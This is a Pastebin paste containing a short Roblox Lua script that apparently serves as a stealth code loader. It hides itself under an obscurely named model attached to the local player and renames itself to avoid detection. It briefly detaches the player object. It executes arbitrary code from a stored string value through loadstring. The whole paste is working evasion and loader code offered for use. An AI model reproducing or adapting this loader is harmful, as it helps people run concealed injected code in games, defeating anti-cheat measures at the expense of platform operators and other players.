Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- wait()
- if script.Name ~= "Roblox Indexed Client" and script.Name ~= "NewTransfer" then
- HideS = nil
- for _,v in next, game:GetService("Players").LocalPlayer:GetChildren() do
- if v.Name == "¬¬¬¬" then
- if HideS == nil then
- v:ClearAllChildren()
- HideS = v
- else
- v:Destroy()
- end
- end
- end
- if HideS == nil then
- HideS = Instance.new("Model")
- HideS.Name = "¬¬¬¬"
- HideS.Parent = game:GetService("Players").LocalPlayer
- end
- script.Name = "NewTransfer"
- script.Parent = HideS
- elseif script.Name == "Roblox Indexed Client" then
- local LP = game:GetService("Players").LocalPlayer
- LP.Parent = nil
- wait()
- LP.Parent = game:GetService("Players")
- else
- loadstring(script:findFirstChild("LoadingVal").Value)()
- end
Add Comment
Please, Sign In to add comment